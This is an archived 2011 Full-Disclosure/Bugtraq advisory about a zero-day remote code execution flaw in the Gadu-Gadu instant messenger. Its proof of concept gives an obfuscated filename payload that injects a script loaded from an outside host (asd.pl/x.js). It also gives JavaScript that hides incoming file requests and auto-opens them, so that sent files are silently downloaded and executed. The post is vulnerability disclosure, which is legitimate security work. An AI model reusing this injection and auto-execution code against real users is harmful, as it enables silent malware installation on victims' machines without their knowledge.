lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BANLkTi=oMN56wZryrzfwZqOaFd8384kS-A@mail.gmail.com>
Date: Tue, 24 May 2011 15:53:14 +0200
From: Kacper Szczesniak <kacper3.14@...il.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Gadu-Gadu 0-Day Remote Code Execution

Vendor: Gadu-Gadu (http://gadu-gadu.pl)
Vulnerable Version: All
Vulnerability Type: XSS, Remote Code Execution
Risk level: Very High
Credit: Kacper Szczesniak <kacper3.14@...il.com>
Vulnerability Details:

Gadu-Gadu improperly handles file transfer requests. It's possible to
place 255 chars of HTML code (no slash) inside the filename. This can
lead to injecting JavaScript into UI using crafted file-send-request
packet. It's possible to trigger various actions from GUI JavaScript
code such as saving and running any file on victim's host. Internal
protocols are abused for these purposes. No 'security' mechanisms like
ASLR or DEP will stop this attack because it's JS code. No user
interaction needed.

PoC:

file name that loads external x.js code:
<input onfocus="eval(unescape('x%3Ddocument.getElementsByTagName%28%27head%27%29.item%280%29%3By%3Ddocument.createElement%28%27script%27%29%3By.src%3D%27http:%2f%2fasd.pl%2fx.js%27%3Bx.appendChild%28y%29%3B'));this.setAttribute('onfocus',0);"
autofocus>

example x.js code to hide, accept and open every file request:

document.getElementById('extra').innerHTML = '<style>.file,
.entrySeparator{display:none;}</style>';
n = document.getElementById('open_file');
n.setAttribute('id', '');

function ff(){
    if(f = document.getElementById('open_file')) {
        e = document.createEvent("HTMLEvents");
        e.initEvent('click', true, true);
        f.dispatchEvent(e);
        f.setAttribute('id', '');
    }
    setTimeout('ff()', 1000);
}

ff();

Now you can just send any file and it'll be silently auto-download and executed

kacper

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ